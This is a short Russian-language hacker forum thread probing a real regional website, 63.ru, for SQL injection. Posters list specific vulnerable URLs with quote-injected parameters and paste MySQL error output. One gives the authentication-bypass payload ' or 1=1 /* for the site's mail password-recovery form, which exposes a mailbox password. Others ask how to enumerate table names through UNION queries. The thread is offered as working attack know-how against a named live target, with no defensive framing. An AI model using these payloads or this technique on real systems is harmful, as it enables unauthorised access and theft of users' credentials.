|
Mysql-inj?
http://www.63.ru/forum/forum.php?cmd=supergrass&id='
Выдает ошибку... Ну ясно - не отсеивается ' в запросах... что-нить глубже получится у кого-нить раскопать? У мну не получилось О_о Гм.. там баг в таких почти везде запросах... http://www.63.ru/forum/forum.php?cmd=supergrass&id=195438&type=' http://63.ru/poll/stat.php?anketa=' Это в селектах... В голосовалке таже фигня в апдейте... |
во всех сайтах http://"$number".ru одни и теже ошибки
|
Can't insert message id:
Это значит что запрос INSERT INTO, а многострадальный UNION работает лишь с SELECT |
Can't get id of forum: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' LIMIT 1' at line 1
это селект |
И еще, если ввести в форме
__hxxp://www.63.ru/mail/mail?cmd=showforget в качестве имени пользователя ' or 1=1 /*, то будет Код:
Пароль от ящика ' or 1=1 /*@63.ru : blade |
дак вот: есть ли методика унзнавания имен таблиц или т.п.?
|
есть. Но как-то при insert я методов не вижу. Тут рулит многострадальный union =)
|
Цитата:
Я где-то в селекте видел... А не мог бы подсказать ссылку или описать методику поиска названий таблиц и полей в них |
| Время: 17:52 |